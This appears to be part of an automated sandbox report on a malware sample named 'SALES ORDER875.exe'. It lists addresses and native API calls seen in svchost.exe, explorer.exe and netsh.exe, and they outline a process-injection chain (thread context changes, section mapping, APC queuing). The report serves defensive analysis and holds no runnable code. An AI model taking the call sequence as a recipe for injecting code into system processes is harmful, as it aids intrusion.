          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00E42DF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42DD0 NtDelayExecution,LdrInitializeThunk,4_2_00E42DD0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42D10 NtMapViewOfSection,LdrInitializeThunk,4_2_00E42D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00E42EA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42FE0 NtCreateFile,LdrInitializeThunk,4_2_00E42FE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42F30 NtCreateSection,LdrInitializeThunk,4_2_00E42F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E435C0 NtCreateMutant,LdrInitializeThunk,4_2_00E435C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E44340 NtSetContextThread,4_2_00E44340
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E44650 NtSuspendThread,4_2_00E44650
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42AF0 NtWriteFile,4_2_00E42AF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42AB0 NtWaitForSingleObject,4_2_00E42AB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42BE0 NtQueryValueKey,4_2_00E42BE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42BF0 NtAllocateVirtualMemory,4_2_00E42BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42BA0 NtEnumerateValueKey,4_2_00E42BA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42B80 NtQueryInformationFile,4_2_00E42B80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42CF0 NtOpenProcess,4_2_00E42CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42CC0 NtQueryVirtualMemory,4_2_00E42CC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42C00 NtQueryInformationProcess,4_2_00E42C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42DB0 NtEnumerateKey,4_2_00E42DB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42D30 NtUnmapViewOfSection,4_2_00E42D30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42D00 NtSetInformationFile,4_2_00E42D00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42EE0 NtQueueApcThread,4_2_00E42EE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42E80 NtReadVirtualMemory,4_2_00E42E80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42E30 NtWriteVirtualMemory,4_2_00E42E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42FA0 NtQuerySection,4_2_00E42FA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42FB0 NtResumeThread,4_2_00E42FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42F90 NtProtectVirtualMemory,4_2_00E42F90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E42F60 NtCreateProcessEx,4_2_00E42F60
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E43090 NtSetValueKey,4_2_00E43090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E43010 NtOpenDirectoryObject,4_2_00E43010
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E439B0 NtGetContextThread,4_2_00E439B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E43D70 NtOpenThread,4_2_00E43D70
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E43D10 NtOpenProcessToken,4_2_00E43D10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001EA320 NtCreateFile,4_2_001EA320
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001EA3D0 NtReadFile,4_2_001EA3D0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001EA450 NtClose,4_2_001EA450
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001EA31D NtCreateFile,4_2_001EA31D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001EA44A NtClose,4_2_001EA44A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C2A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,4_2_00C2A036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C29BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,4_2_00C29BAF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C2A042 NtQueryInformationProcess,4_2_00C2A042
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C29BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00C29BB2
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_003ED5EB
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_003E1201
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003EE8F6
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0038BF400_2_0038BF40
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003880600_2_00388060
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F20460_2_003F2046
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E82980_2_003E8298
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003BE4FF0_2_003BE4FF
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003B676B0_2_003B676B
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_004148730_2_00414873
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003ACAA00_2_003ACAA0
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0038CAF00_2_0038CAF0
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0039CC390_2_0039CC39
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003B6DD90_2_003B6DD9
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0039B1190_2_0039B119
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003891C00_2_003891C0
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A13940_2_003A1394
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A17060_2_003A1706
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A781B0_2_003A781B
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003879200_2_00387920
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0039997D0_2_0039997D
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A19B00_2_003A19B0
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A7A4A0_2_003A7A4A
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A1C770_2_003A1C77
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A7CA70_2_003A7CA7
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0040BE440_2_0040BE44
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003B9EEE0_2_003B9EEE
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A1F320_2_003A1F32
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_01A913200_2_01A91320
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_01A915320_2_01A91532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA3521_2_032FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F01_2_0324E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033003E61_2_033003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E02741_2_032E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C02C01_2_032C02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032301001_2_03230100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA1181_2_032DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C81581_2_032C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F41A21_2_032F41A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033001AA1_2_033001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F81CC1_2_032F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D20001_2_032D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032407701_2_03240770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032647501_2_03264750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C01_2_0323C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C6E01_2_0325C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032405351_2_03240535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033005911_2_03300591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E44201_2_032E4420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F24461_2_032F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EE4F61_2_032EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB401_2_032FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F6BD71_2_032F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA801_2_0323EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032569621_2_03256962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A01_2_032429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330A9A61_2_0330A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324A8401_2_0324A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032428401_2_03242840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032268B81_2_032268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E8F01_2_0326E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03282F281_2_03282F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260F301_2_03260F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E2F301_2_032E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4F401_2_032B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BEFA01_2_032BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232FC81_2_03232FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEE261_2_032FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240E591_2_03240E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252E901_2_03252E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FCE931_2_032FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEEDB1_2_032FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324AD001_2_0324AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DCD1F1_2_032DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03258DBF1_2_03258DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032856301_2_03285630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033095C31_2_033095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD21_2_03203FD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD51_2_03203FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CC3F21_2_006CC3F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CE79D1_2_006CE79D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006B2D901_2_006B2D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006B2FB01_2_006B2FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006B10301_2_006B1030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CD89D1_2_006CD89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006B9E4C1_2_006B9E4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006B9E501_2_006B9E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316A0361_2_0316A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316B2321_2_0316B232
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031610821_2_03161082
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E5CD1_2_0316E5CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03165B321_2_03165B32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03165B301_2_03165B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031689121_2_03168912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03162D021_2_03162D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4CA2323_2_0E4CA232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4C4B303_2_0E4C4B30
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4C4B323_2_0E4C4B32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4C90363_2_0E4C9036
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4C00823_2_0E4C0082
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4C1D023_2_0E4C1D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4C79123_2_0E4C7912
          Source: C:\Windows\explorer.exeCode function: 3_2_0E4CD5CD3_2_0E4CD5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6602323_2_0E660232
          Source: C:\Windows\explorer.exeCode function: 3_2_0E65F0363_2_0E65F036
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6560823_2_0E656082
          Source: C:\Windows\explorer.exeCode function: 3_2_0E65AB303_2_0E65AB30
          Source: C:\Windows\explorer.exeCode function: 3_2_0E65AB323_2_0E65AB32
          Source: C:\Windows\explorer.exeCode function: 3_2_0E657D023_2_0E657D02
          Source: C:\Windows\explorer.exeCode function: 3_2_0E65D9123_2_0E65D912
          Source: C:\Windows\explorer.exeCode function: 3_2_0E6635CD3_2_0E6635CD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EA20004_2_00EA2000
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC81CC4_2_00EC81CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ED01AA4_2_00ED01AA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC41A24_2_00EC41A2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E981584_2_00E98158
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E001004_2_00E00100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EAA1184_2_00EAA118
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E902C04_2_00E902C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EB02744_2_00EB0274
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ED03E64_2_00ED03E6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E1E3F04_2_00E1E3F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECA3524_2_00ECA352
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EBE4F64_2_00EBE4F6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC24464_2_00EC2446
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EB44204_2_00EB4420
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ED05914_2_00ED0591
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E105354_2_00E10535
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E2C6E04_2_00E2C6E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E0C7C04_2_00E0C7C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E107704_2_00E10770
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E347504_2_00E34750
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E3E8F04_2_00E3E8F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00DF68B84_2_00DF68B8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E1A8404_2_00E1A840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E128404_2_00E12840
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E129A04_2_00E129A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EDA9A64_2_00EDA9A6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E269624_2_00E26962
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E0EA804_2_00E0EA80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC6BD74_2_00EC6BD7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECAB404_2_00ECAB40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E00CF24_2_00E00CF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EB0CB54_2_00EB0CB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E10C004_2_00E10C00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E0ADE04_2_00E0ADE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E28DBF4_2_00E28DBF
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E1AD004_2_00E1AD00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EACD1F4_2_00EACD1F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECEEDB4_2_00ECEEDB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E22E904_2_00E22E90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECCE934_2_00ECCE93
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E10E594_2_00E10E59
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECEE264_2_00ECEE26
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E02FC84_2_00E02FC8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E8EFA04_2_00E8EFA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E84F404_2_00E84F40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E52F284_2_00E52F28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E30F304_2_00E30F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EB2F304_2_00EB2F30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC70E94_2_00EC70E9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECF0E04_2_00ECF0E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E170C04_2_00E170C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EBF0CC4_2_00EBF0CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E1B1B04_2_00E1B1B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EDB16B4_2_00EDB16B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E4516C4_2_00E4516C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00DFF1724_2_00DFF172
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EB12ED4_2_00EB12ED
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E2D2F04_2_00E2D2F0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E2B2C04_2_00E2B2C0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E152A04_2_00E152A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E5739A4_2_00E5739A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00DFD34C4_2_00DFD34C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC132D4_2_00EC132D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E014604_2_00E01460
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECF43F4_2_00ECF43F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EAD5B04_2_00EAD5B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC75714_2_00EC7571
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC16CC4_2_00EC16CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECF7B04_2_00ECF7B0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E138E04_2_00E138E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E7D8004_2_00E7D800
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E199504_2_00E19950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E2B9504_2_00E2B950
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EA59104_2_00EA5910
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EBDAC64_2_00EBDAC6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E55AA04_2_00E55AA0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EADAAC4_2_00EADAAC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EB1AA34_2_00EB1AA3
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E83A6C4_2_00E83A6C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECFA494_2_00ECFA49
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC7A464_2_00EC7A46
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E85BF04_2_00E85BF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E4DBF94_2_00E4DBF9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E2FB804_2_00E2FB80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECFB764_2_00ECFB76
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECFCF24_2_00ECFCF2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E89C324_2_00E89C32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E2FDC04_2_00E2FDC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC7D734_2_00EC7D73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E13D404_2_00E13D40
